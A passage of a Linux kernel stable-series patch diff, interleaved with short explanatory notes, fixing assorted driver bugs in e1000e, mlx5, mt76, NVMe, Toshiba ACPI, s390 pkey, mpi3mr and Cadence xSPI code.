++	/* No MAC DPG gating SLP_S0 in modern standby
++	 * Switch the logic of the lanphypc to use PMC counter
++	 */
++	mac_data = er32(FEXTNVM5);
++	mac_data |= BIT(7);
++	ew32(FEXTNVM5, mac_data);
++
+ 	/* Disable the time synchronization clock */
+ 	mac_data = er32(FEXTNVM7);
+ 	mac_data |= BIT(31);
+@@ -6503,33 +6503,6 @@ static void e1000e_s0ix_exit_flow(struct e1000_adapter *adapter)
+ 	} else {
+ 		/* Request driver unconfigure the device from S0ix */
+ 
+-		/* Disable the Dynamic Power Gating in the MAC */
+-		mac_data = er32(FEXTNVM7);
+-		mac_data &= 0xFFBFFFFF;
+-		ew32(FEXTNVM7, mac_data);
+-
+-		/* Disable mPHY power gating for any link and speed */
+-		mac_data = er32(FEXTNVM8);
+-		mac_data &= ~BIT(9);
+-		ew32(FEXTNVM8, mac_data);
+-
+-		/* Disable K1 off */
+-		mac_data = er32(FEXTNVM6);
+-		mac_data &= ~BIT(31);
+-		ew32(FEXTNVM6, mac_data);
+-
+-		/* Disable Ungate PGCB clock */
+-		mac_data = er32(FEXTNVM9);
+-		mac_data |= BIT(28);
+-		ew32(FEXTNVM9, mac_data);
+-
+-		/* Cancel not waking from dynamic
+-		 * Power Gating with clock request
+-		 */
+-		mac_data = er32(FEXTNVM12);
+-		mac_data &= ~BIT(12);
+-		ew32(FEXTNVM12, mac_data);
+-
+ 		/* Cancel disable disconnected cable conditioning
+ 		 * for Power Gating
+ 		 */
+@@ -6542,13 +6515,6 @@ static void e1000e_s0ix_exit_flow(struct e1000_adapter *adapter)
+ 		mac_data &= 0xFFF7FFFF;
+ 		ew32(CTRL_EXT, mac_data);
+ 
+-		/* Revert the lanphypc logic to use the internal Gbe counter
+-		 * and not the PMC counter
+-		 */
+-		mac_data = er32(FEXTNVM5);
+-		mac_data &= 0xFFFFFF7F;
+-		ew32(FEXTNVM5, mac_data);
+-
+ 		/* Enable the periodic inband message,
+ 		 * Request PCIe clock in K1 page770_17[10:9] =01b
+ 		 */
+@@ -6586,6 +6552,40 @@ static void e1000e_s0ix_exit_flow(struct e1000_adapter *adapter)
+ 	mac_data &= ~BIT(31);
+ 	mac_data |= BIT(0);
+ 	ew32(FEXTNVM7, mac_data);
++
++	/* Disable the Dynamic Power Gating in the MAC */
++	mac_data = er32(FEXTNVM7);
++	mac_data &= 0xFFBFFFFF;
++	ew32(FEXTNVM7, mac_data);
++
++	/* Disable mPHY power gating for any link and speed */
++	mac_data = er32(FEXTNVM8);
++	mac_data &= ~BIT(9);
++	ew32(FEXTNVM8, mac_data);
++
++	/* Disable K1 off */
++	mac_data = er32(FEXTNVM6);
++	mac_data &= ~BIT(31);
++	ew32(FEXTNVM6, mac_data);
++
++	/* Disable Ungate PGCB clock */
++	mac_data = er32(FEXTNVM9);
++	mac_data |= BIT(28);
++	ew32(FEXTNVM9, mac_data);
++
++	/* Cancel not waking from dynamic
++	 * Power Gating with clock request
++	 */
++	mac_data = er32(FEXTNVM12);
++	mac_data &= ~BIT(12);
++	ew32(FEXTNVM12, mac_data);
++
++	/* Revert the lanphypc logic to use the internal Gbe counter
++	 * and not the PMC counter
++	 */
++	mac_data = er32(FEXTNVM5);
++	mac_data &= 0xFFFFFF7F;
++	ew32(FEXTNVM5, mac_data);
+ }
+ 
+ static int e1000e_pm_freeze(struct device *dev)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 4c0eac83546de..385904502a6be 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5584,6 +5584,11 @@ void mlx5e_priv_cleanup(struct mlx5e_priv *priv)
+ 		kfree(priv->htb_qos_sq_stats[i]);
+ 	kvfree(priv->htb_qos_sq_stats);
+ 
++	if (priv->mqprio_rl) {
++		mlx5e_mqprio_rl_cleanup(priv->mqprio_rl);
++		mlx5e_mqprio_rl_free(priv->mqprio_rl);
++	}
++
+ 	memset(priv, 0, sizeof(*priv));
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+index db578a7e7008a..59fb31201c35e 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+@@ -6,6 +6,9 @@
+ #include "helper.h"
+ #include "ofld.h"
+ 
++static int
++acl_ingress_ofld_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport);
++
+ static bool
+ esw_acl_ingress_prio_tag_enabled(struct mlx5_eswitch *esw,
+ 				 const struct mlx5_vport *vport)
+@@ -123,18 +126,31 @@ static int esw_acl_ingress_src_port_drop_create(struct mlx5_eswitch *esw,
+ {
+ 	struct mlx5_flow_act flow_act = {};
+ 	struct mlx5_flow_handle *flow_rule;
++	bool created = false;
+ 	int err = 0;
+ 
++	if (!vport->ingress.acl) {
++		err = acl_ingress_ofld_setup(esw, vport);
++		if (err)
++			return err;
++		created = true;
++	}
++
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_DROP;
+ 	flow_act.fg = vport->ingress.offloads.drop_grp;
+ 	flow_rule = mlx5_add_flow_rules(vport->ingress.acl, NULL, &flow_act, NULL, 0);
+ 	if (IS_ERR(flow_rule)) {
+ 		err = PTR_ERR(flow_rule);
+-		goto out;
++		goto err_out;
+ 	}
+ 
+ 	vport->ingress.offloads.drop_rule = flow_rule;
+-out:
++
++	return 0;
++err_out:
++	/* Only destroy ingress acl created in this function. */
++	if (created)
++		esw_acl_ingress_ofld_cleanup(esw, vport);
+ 	return err;
+ }
+ 
+@@ -299,16 +315,12 @@ static void esw_acl_ingress_ofld_groups_destroy(struct mlx5_vport *vport)
+ 	}
+ }
+ 
+-int esw_acl_ingress_ofld_setup(struct mlx5_eswitch *esw,
+-			       struct mlx5_vport *vport)
++static int
++acl_ingress_ofld_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport)
+ {
+ 	int num_ftes = 0;
+ 	int err;
+ 
+-	if (!mlx5_eswitch_vport_match_metadata_enabled(esw) &&
+-	    !esw_acl_ingress_prio_tag_enabled(esw, vport))
+-		return 0;
+-
+ 	esw_acl_ingress_allow_rule_destroy(vport);
+ 
+ 	if (mlx5_eswitch_vport_match_metadata_enabled(esw))
+@@ -347,6 +359,15 @@ int esw_acl_ingress_ofld_setup(struct mlx5_eswitch *esw,
+ 	return err;
+ }
+ 
++int esw_acl_ingress_ofld_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport)
++{
++	if (!mlx5_eswitch_vport_match_metadata_enabled(esw) &&
++	    !esw_acl_ingress_prio_tag_enabled(esw, vport))
++		return 0;
++
++	return acl_ingress_ofld_setup(esw, vport);
++}
++
+ void esw_acl_ingress_ofld_cleanup(struct mlx5_eswitch *esw,
+ 				  struct mlx5_vport *vport)
+ {
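
The ingress ACL rework above lazily creates the ACL table when the drop rule needs it, and on failure tears down only what this call created. A generic sketch of that "clean up only what you created" pattern, with hypothetical types and helpers:

struct ctx { void *table; };		/* hypothetical */
int table_setup(struct ctx *c);		/* hypothetical helpers */
void table_teardown(struct ctx *c);
int rule_install(struct ctx *c);

/* Sketch: if the resource already existed, a failure here must not
 * destroy it, since another owner set it up.
 */
static int add_rule(struct ctx *c)
{
	bool created = false;
	int err;

	if (!c->table) {
		err = table_setup(c);
		if (err)
			return err;
		created = true;
	}

	err = rule_install(c);
	if (err && created)
		table_teardown(c);
	return err;
}
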
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_linecards.c b/drivers/net/ethernet/mellanox/mlxsw/core_linecards.c
+index 83d2dc91ba2c8..99196333d1324 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_linecards.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_linecards.c
+@@ -1484,6 +1484,7 @@ static int mlxsw_linecard_types_init(struct mlxsw_core *mlxsw_core,
+ 	vfree(types_info->data);
+ err_data_alloc:
+ 	kfree(types_info);
++	linecards->types_info = NULL;
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ntb_netdev.c b/drivers/net/ntb_netdev.c
+index 85dbe7f73e319..535dc5b2901fc 100644
+--- a/drivers/net/ntb_netdev.c
++++ b/drivers/net/ntb_netdev.c
+@@ -119,7 +119,7 @@ static void ntb_netdev_rx_handler(struct ntb_transport_qp *qp, void *qp_data,
+ 	skb->protocol = eth_type_trans(skb, ndev);
+ 	skb->ip_summed = CHECKSUM_NONE;
+ 
+-	if (__netif_rx(skb) == NET_RX_DROP) {
++	if (netif_rx(skb) == NET_RX_DROP) {
+ 		ndev->stats.rx_errors++;
+ 		ndev->stats.rx_dropped++;
+ 	} else {
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index 546cbe21aab31..6b5bfdbec8b11 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -254,7 +254,7 @@ mt76_connac_mcu_add_nested_tlv(struct sk_buff *skb, int tag, int len,
+ 	};
+ 	u16 ntlv;
+ 
+-	ptlv = skb_put(skb, len);
++	ptlv = skb_put_zero(skb, len);
+ 	memcpy(ptlv, &tlv, sizeof(tlv));
+ 
+ 	ntlv = le16_to_cpu(ntlv_hdr->tlv_num);
+@@ -1532,7 +1532,7 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 	set_bit(MT76_HW_SCANNING, &phy->state);
+ 	mvif->scan_seq_num = (mvif->scan_seq_num + 1) & 0x7f;
+ 
+-	req = (struct mt76_connac_hw_scan_req *)skb_put(skb, sizeof(*req));
++	req = (struct mt76_connac_hw_scan_req *)skb_put_zero(skb, sizeof(*req));
+ 
+ 	req->seq_num = mvif->scan_seq_num | mvif->band_idx << 7;
+ 	req->bss_idx = mvif->idx;
+@@ -1660,7 +1660,7 @@ int mt76_connac_mcu_sched_scan_req(struct mt76_phy *phy,
+ 
+ 	mvif->scan_seq_num = (mvif->scan_seq_num + 1) & 0x7f;
+ 
+-	req = (struct mt76_connac_sched_scan_req *)skb_put(skb, sizeof(*req));
++	req = (struct mt76_connac_sched_scan_req *)skb_put_zero(skb, sizeof(*req));
+ 	req->version = 1;
+ 	req->seq_num = mvif->scan_seq_num | mvif->band_idx << 7;
+ 
+@@ -2294,7 +2294,7 @@ int mt76_connac_mcu_update_gtk_rekey(struct ieee80211_hw *hw,
+ 		return -ENOMEM;
+ 
+ 	skb_put_data(skb, &hdr, sizeof(hdr));
+-	gtk_tlv = (struct mt76_connac_gtk_rekey_tlv *)skb_put(skb,
++	gtk_tlv = (struct mt76_connac_gtk_rekey_tlv *)skb_put_zero(skb,
+ 							 sizeof(*gtk_tlv));
+ 	gtk_tlv->tag = cpu_to_le16(UNI_OFFLOAD_OFFLOAD_GTK_REKEY);
+ 	gtk_tlv->len = cpu_to_le16(sizeof(*gtk_tlv));
+@@ -2417,7 +2417,7 @@ mt76_connac_mcu_set_wow_pattern(struct mt76_dev *dev,
+ 		return -ENOMEM;
+ 
+ 	skb_put_data(skb, &hdr, sizeof(hdr));
+-	ptlv = (struct mt76_connac_wow_pattern_tlv *)skb_put(skb, sizeof(*ptlv));
++	ptlv = (struct mt76_connac_wow_pattern_tlv *)skb_put_zero(skb, sizeof(*ptlv));
+ 	ptlv->tag = cpu_to_le16(UNI_SUSPEND_WOW_PATTERN);
+ 	ptlv->len = cpu_to_le16(sizeof(*ptlv));
+ 	ptlv->data_len = pattern->pattern_len;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+index b2ea539f697f7..65f07cc2acdd4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+@@ -395,7 +395,7 @@ mt7915_mcu_add_nested_subtlv(struct sk_buff *skb, int sub_tag, int sub_len,
+ 		.len = cpu_to_le16(sub_len),
+ 	};
+ 
+-	ptlv = skb_put(skb, sub_len);
++	ptlv = skb_put_zero(skb, sub_len);
+ 	memcpy(ptlv, &tlv, sizeof(tlv));
+ 
+ 	le16_add_cpu(sub_ntlv, 1);
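
skb_put() only advances the tail pointer; the reserved bytes are not cleared. When the area is longer than the struct copied into it, as with the variable-length TLVs in the MCU messages above, the slack would otherwise carry stale kernel data out to the firmware. skb_put_zero() zeroes the whole area first. A sketch:

#include <linux/skbuff.h>
#include <linux/string.h>

/* Sketch: reserve and zero `reserved_len` bytes, then copy the fixed
 * header; any tail padding stays zeroed.
 */
static void *put_tlv(struct sk_buff *skb, const void *tlv,
		     size_t tlv_len, size_t reserved_len)
{
	void *p = skb_put_zero(skb, reserved_len);

	memcpy(p, tlv, tlv_len);
	return p;
}
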
+diff --git a/drivers/net/wireless/microchip/wilc1000/hif.c b/drivers/net/wireless/microchip/wilc1000/hif.c
+index 5eb02902e875a..13853fda3e047 100644
+--- a/drivers/net/wireless/microchip/wilc1000/hif.c
++++ b/drivers/net/wireless/microchip/wilc1000/hif.c
+@@ -379,7 +379,8 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 	struct ieee80211_p2p_noa_attr noa_attr;
+ 	const struct cfg80211_bss_ies *ies;
+ 	struct wilc_join_bss_param *param;
+-	u8 rates_len = 0, ies_len;
++	u8 rates_len = 0;
++	int ies_len;
+ 	int ret;
+ 
+ 	param = kzalloc(sizeof(*param), GFP_KERNEL);
+diff --git a/drivers/nfc/virtual_ncidev.c b/drivers/nfc/virtual_ncidev.c
+index 85c06dbb2c449..9fffd4421ad5b 100644
+--- a/drivers/nfc/virtual_ncidev.c
++++ b/drivers/nfc/virtual_ncidev.c
+@@ -121,6 +121,10 @@ static ssize_t virtual_ncidev_write(struct file *file,
+ 		kfree_skb(skb);
+ 		return -EFAULT;
+ 	}
++	if (strnlen(skb->data, count) != count) {
++		kfree_skb(skb);
++		return -EINVAL;
++	}
+ 
+ 	nci_recv_frame(ndev, skb);
+ 	return count;
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index 6cf0ce7aff678..d0154859421db 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -559,7 +559,7 @@ static void nvme_mpath_set_live(struct nvme_ns *ns)
+ 		int node, srcu_idx;
+ 
+ 		srcu_idx = srcu_read_lock(&head->srcu);
+-		for_each_node(node)
++		for_each_online_node(node)
+ 			__nvme_find_path(head, node);
+ 		srcu_read_unlock(&head->srcu, srcu_idx);
+ 	}
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 5ff09f2cacab7..32e89ea853a47 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -824,7 +824,8 @@ static blk_status_t nvme_map_data(struct nvme_dev *dev, struct request *req,
+ 		struct bio_vec bv = req_bvec(req);
+ 
+ 		if (!is_pci_p2pdma_page(bv.bv_page)) {
+-			if (bv.bv_offset + bv.bv_len <= NVME_CTRL_PAGE_SIZE * 2)
++			if ((bv.bv_offset & (NVME_CTRL_PAGE_SIZE - 1)) +
++			     bv.bv_len <= NVME_CTRL_PAGE_SIZE * 2)
+ 				return nvme_setup_prp_simple(dev, req,
+ 							     &cmnd->rw, &bv);
+ 
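
The PRP fast path is only legal when the payload spans at most two controller pages, and that depends on the offset modulo NVME_CTRL_PAGE_SIZE, not on bv_offset itself, which can exceed a controller page when kernel pages are larger. A worked sketch assuming 4 KiB controller pages:

/* Sketch: with 16 KiB kernel pages, a bvec at bv_offset = 0x1000 and
 * bv_len = 0x2000 starts exactly on a controller-page boundary
 * (0x1000 & 0xFFF == 0) and fits in two PRPs, yet the unmasked test
 * 0x1000 + 0x2000 <= 0x2000 would wrongly say it does not.
 */
#define CTRL_PAGE_SIZE 4096u

static bool fits_two_prps(unsigned int bv_offset, unsigned int bv_len)
{
	unsigned int off = bv_offset & (CTRL_PAGE_SIZE - 1);

	return off + bv_len <= 2 * CTRL_PAGE_SIZE;
}
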
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index 7b74926c50f9b..d2954406b2297 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -805,6 +805,15 @@ void nvmet_sq_destroy(struct nvmet_sq *sq)
+ 	percpu_ref_exit(&sq->ref);
+ 	nvmet_auth_sq_free(sq);
+ 
++	/*
++	 * We must reference the ctrl again after waiting for inflight IO
++	 * to complete, because an admin connect may have sneaked in after
++	 * we stored sq->ctrl locally but before we killed the percpu_ref.
++	 * The admin connect allocates and assigns sq->ctrl, which now
++	 * needs a final ref put, as this ctrl is going away.
++	 */
++	ctrl = sq->ctrl;
++
+ 	if (ctrl) {
+ 		/*
+ 		 * The teardown flow may take some time, and the host may not
+diff --git a/drivers/platform/x86/toshiba_acpi.c b/drivers/platform/x86/toshiba_acpi.c
+index f10994b94a33a..1a8cb8eb22829 100644
+--- a/drivers/platform/x86/toshiba_acpi.c
++++ b/drivers/platform/x86/toshiba_acpi.c
+@@ -3277,7 +3277,7 @@ static const char *find_hci_method(acpi_handle handle)
+  */
+ #define QUIRK_HCI_HOTKEY_QUICKSTART		BIT(1)
+ 
+-static const struct dmi_system_id toshiba_dmi_quirks[] = {
++static const struct dmi_system_id toshiba_dmi_quirks[] __initconst = {
+ 	{
+ 	 /* Toshiba Portégé R700 */
+ 	 /* https://bugzilla.kernel.org/show_bug.cgi?id=21012 */
+@@ -3312,8 +3312,6 @@ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+ 	struct toshiba_acpi_dev *dev;
+ 	const char *hci_method;
+ 	u32 dummy;
+-	const struct dmi_system_id *dmi_id;
+-	long quirks = 0;
+ 	int ret = 0;
+ 
+ 	if (toshiba_acpi)
+@@ -3466,16 +3464,6 @@ static int toshiba_acpi_add(struct acpi_device *acpi_dev)
+ 	}
+ #endif
+ 
+-	dmi_id = dmi_first_match(toshiba_dmi_quirks);
+-	if (dmi_id)
+-		quirks = (long)dmi_id->driver_data;
+-
+-	if (turn_on_panel_on_resume == -1)
+-		turn_on_panel_on_resume = !!(quirks & QUIRK_TURN_ON_PANEL_ON_RESUME);
+-
+-	if (hci_hotkey_quickstart == -1)
+-		hci_hotkey_quickstart = !!(quirks & QUIRK_HCI_HOTKEY_QUICKSTART);
+-
+ 	toshiba_wwan_available(dev);
+ 	if (dev->wwan_supported)
+ 		toshiba_acpi_setup_wwan_rfkill(dev);
+@@ -3624,10 +3612,27 @@ static struct acpi_driver toshiba_acpi_driver = {
+ 	.drv.pm	= &toshiba_acpi_pm,
+ };
+ 
++static void __init toshiba_dmi_init(void)
++{
++	const struct dmi_system_id *dmi_id;
++	long quirks = 0;
++
++	dmi_id = dmi_first_match(toshiba_dmi_quirks);
++	if (dmi_id)
++		quirks = (long)dmi_id->driver_data;
++
++	if (turn_on_panel_on_resume == -1)
++		turn_on_panel_on_resume = !!(quirks & QUIRK_TURN_ON_PANEL_ON_RESUME);
++
++	if (hci_hotkey_quickstart == -1)
++		hci_hotkey_quickstart = !!(quirks & QUIRK_HCI_HOTKEY_QUICKSTART);
++}
++
+ static int __init toshiba_acpi_init(void)
+ {
+ 	int ret;
+ 
++	toshiba_dmi_init();
+ 	toshiba_proc_dir = proc_mkdir(PROC_TOSHIBA, acpi_root_dir);
+ 	if (!toshiba_proc_dir) {
+ 		pr_err("Unable to create proc dir " PROC_TOSHIBA "\n");
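
Moving the quirk lookup from device add to module init is what lets the DMI table above be marked __initconst: both the table and the function that reads it can be discarded after boot. A sketch with illustrative names:

#include <linux/dmi.h>
#include <linux/init.h>

/* Sketch: a quirk table consulted only at load time. */
static const struct dmi_system_id quirks[] __initconst = {
	{
		.matches = { DMI_MATCH(DMI_SYS_VENDOR, "Example Vendor") },
		.driver_data = (void *)0x1L,
	},
	{ }
};

static long module_quirks;

static int __init example_init(void)
{
	const struct dmi_system_id *id = dmi_first_match(quirks);

	if (id)
		module_quirks = (long)id->driver_data;
	return 0;
}
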
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index 399b97b54dd0f..029355a2f389d 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -871,6 +871,22 @@ static const struct ts_dmi_data schneider_sct101ctm_data = {
+ 	.properties	= schneider_sct101ctm_props,
+ };
+ 
++static const struct property_entry globalspace_solt_ivw116_props[] = {
++	PROPERTY_ENTRY_U32("touchscreen-min-x", 7),
++	PROPERTY_ENTRY_U32("touchscreen-min-y", 22),
++	PROPERTY_ENTRY_U32("touchscreen-size-x", 1723),
++	PROPERTY_ENTRY_U32("touchscreen-size-y", 1077),
++	PROPERTY_ENTRY_STRING("firmware-name", "gsl1680-globalspace-solt-ivw116.fw"),
++	PROPERTY_ENTRY_U32("silead,max-fingers", 10),
++	PROPERTY_ENTRY_BOOL("silead,home-button"),
++	{ }
++};
++
++static const struct ts_dmi_data globalspace_solt_ivw116_data = {
++	.acpi_name	= "MSSL1680:00",
++	.properties	= globalspace_solt_ivw116_props,
++};
++
+ static const struct property_entry techbite_arc_11_6_props[] = {
+ 	PROPERTY_ENTRY_U32("touchscreen-min-x", 5),
+ 	PROPERTY_ENTRY_U32("touchscreen-min-y", 7),
+@@ -1345,6 +1361,17 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_DATE, "04/24/2018"),
+ 		},
+ 	},
++	{
++		/* Jumper EZpad 6s Pro */
++		.driver_data = (void *)&jumper_ezpad_6_pro_b_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Jumper"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Ezpad"),
++			/* Above matches are too generic, add bios match */
++			DMI_MATCH(DMI_BIOS_VERSION, "E.WSA116_8.E1.042.bin"),
++			DMI_MATCH(DMI_BIOS_DATE, "01/08/2020"),
++		},
++	},
+ 	{
+ 		/* Jumper EZpad 6 m4 */
+ 		.driver_data = (void *)&jumper_ezpad_6_m4_data,
+@@ -1584,6 +1611,15 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "SCT101CTM"),
+ 		},
+ 	},
++	{
++		/* GlobalSpace SoLT IVW 11.6" */
++		.driver_data = (void *)&globalspace_solt_ivw116_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Globalspace Tech Pvt Ltd"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "SolTIVW"),
++			DMI_MATCH(DMI_PRODUCT_SKU, "PN20170413488"),
++		},
++	},
+ 	{
+ 		/* Techbite Arc 11.6 */
+ 		.driver_data = (void *)&techbite_arc_11_6_data,
+diff --git a/drivers/s390/crypto/pkey_api.c b/drivers/s390/crypto/pkey_api.c
+index df0f19e6d9235..17885c9f55cb2 100644
+--- a/drivers/s390/crypto/pkey_api.c
++++ b/drivers/s390/crypto/pkey_api.c
+@@ -1191,7 +1191,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 		if (rc)
+ 			break;
+ 		if (copy_to_user(ucs, &kcs, sizeof(kcs)))
+-			return -EFAULT;
++			rc = -EFAULT;
+ 		memzero_explicit(&kcs, sizeof(kcs));
+ 		break;
+ 	}
+@@ -1223,7 +1223,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 		if (rc)
+ 			break;
+ 		if (copy_to_user(ucp, &kcp, sizeof(kcp)))
+-			return -EFAULT;
++			rc = -EFAULT;
+ 		memzero_explicit(&kcp, sizeof(kcp));
+ 		break;
+ 	}
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 5748bd9369ff7..f5001fadd5b12 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1355,11 +1355,21 @@ static struct mpi3mr_sas_port *mpi3mr_sas_port_add(struct mpi3mr_ioc *mrioc,
+ 	mpi3mr_sas_port_sanity_check(mrioc, mr_sas_node,
+ 	    mr_sas_port->remote_identify.sas_address, hba_port);
+ 
++	if (mr_sas_node->num_phys > sizeof(mr_sas_port->phy_mask) * 8)
++		ioc_info(mrioc, "max port count %u could be too high\n",
++		    mr_sas_node->num_phys);
++
+ 	for (i = 0; i < mr_sas_node->num_phys; i++) {
+ 		if ((mr_sas_node->phy[i].remote_identify.sas_address !=
+ 		    mr_sas_port->remote_identify.sas_address) ||
+ 		    (mr_sas_node->phy[i].hba_port != hba_port))
+ 			continue;
++
++		if (i > sizeof(mr_sas_port->phy_mask) * 8) {
++			ioc_warn(mrioc, "skipping port %u, max allowed value is %zu\n",
++			    i, sizeof(mr_sas_port->phy_mask) * 8);
++			goto out_fail;
++		}
+ 		list_add_tail(&mr_sas_node->phy[i].port_siblings,
+ 		    &mr_sas_port->phy_list);
+ 		mr_sas_port->num_phys++;
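Both checks added above compare a phy index against the bit width of phy_mask, i.e. sizeof(mask) * 8. A self-contained userspace illustration of that guard (a zero-based index must be strictly less than the width, hence the >= below; all names here are illustrative):

#include <stdint.h>
#include <stdio.h>

static int set_phy_bit(uint64_t *mask, unsigned int phy)
{
	/* Reject indexes that do not fit in the mask's bit width. */
	if (phy >= sizeof(*mask) * 8) {
		fprintf(stderr, "phy %u exceeds %zu-bit mask\n",
			phy, sizeof(*mask) * 8);
		return -1;
	}
	*mask |= UINT64_C(1) << phy;
	return 0;
}

int main(void)
{
	uint64_t mask = 0;

	set_phy_bit(&mask, 5);		/* ok */
	set_phy_bit(&mask, 64);		/* rejected: shift would overflow */
	printf("mask = %#llx\n", (unsigned long long)mask);
	return 0;
}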
+diff --git a/drivers/scsi/qedf/qedf_io.c b/drivers/scsi/qedf/qedf_io.c
+index 10fe3383855c0..031e605b3f427 100644
+--- a/drivers/scsi/qedf/qedf_io.c
++++ b/drivers/scsi/qedf/qedf_io.c
+@@ -2331,9 +2331,6 @@ static int qedf_execute_tmf(struct qedf_rport *fcport, struct scsi_cmnd *sc_cmd,
+ 	io_req->fcport = fcport;
+ 	io_req->cmd_type = QEDF_TASK_MGMT_CMD;
+ 
+-	/* Record which cpu this request is associated with */
+-	io_req->cpu = smp_processor_id();
+-
+ 	/* Set TM flags */
+ 	io_req->io_req_flags = QEDF_READ;
+ 	io_req->data_xfer_len = 0;
+@@ -2355,6 +2352,9 @@ static int qedf_execute_tmf(struct qedf_rport *fcport, struct scsi_cmnd *sc_cmd,
+ 
+ 	spin_lock_irqsave(&fcport->rport_lock, flags);
+ 
++	/* Record which cpu this request is associated with */
++	io_req->cpu = smp_processor_id();
++
+ 	sqe_idx = qedf_get_sqe_idx(fcport);
+ 	sqe = &fcport->sq[sqe_idx];
+ 	memset(sqe, 0, sizeof(struct fcoe_wqe));
+diff --git a/drivers/spi/spi-cadence-xspi.c b/drivers/spi/spi-cadence-xspi.c
+index d28b8bd5b70bc..b8bed8f39d2ae 100644
+--- a/drivers/spi/spi-cadence-xspi.c
++++ b/drivers/spi/spi-cadence-xspi.c
+@@ -146,6 +146,9 @@
+ #define CDNS_XSPI_STIG_DONE_FLAG		BIT(0)
+ #define CDNS_XSPI_TRD_STATUS			0x0104
+ 
++#define MODE_NO_OF_BYTES			GENMASK(25, 24)
++#define MODEBYTES_COUNT			1
++
+ /* Helper macros for filling command registers */
+ #define CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_1(op, data_phase) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_INSTR_TYPE, (data_phase) ? \
+@@ -158,9 +161,10 @@
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R2_ADDR3, ((op)->addr.val >> 24) & 0xFF) | \
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R2_ADDR4, ((op)->addr.val >> 32) & 0xFF))
+ 
+-#define CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op) ( \
++#define CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op, modebytes) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R3_ADDR5, ((op)->addr.val >> 40) & 0xFF) | \
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R3_CMD, (op)->cmd.opcode) | \
++	FIELD_PREP(MODE_NO_OF_BYTES, modebytes) | \
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R3_NUM_ADDR_BYTES, (op)->addr.nbytes))
+ 
+ #define CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_4(op, chipsel) ( \
+@@ -174,12 +178,12 @@
+ #define CDNS_XSPI_CMD_FLD_DSEQ_CMD_2(op) \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R2_DCNT_L, (op)->data.nbytes & 0xFFFF)
+ 
+-#define CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op) ( \
++#define CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op, dummybytes) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_DCNT_H, \
+ 		((op)->data.nbytes >> 16) & 0xffff) | \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_NUM_OF_DUMMY, \
+ 		  (op)->dummy.buswidth != 0 ? \
+-		  (((op)->dummy.nbytes * 8) / (op)->dummy.buswidth) : \
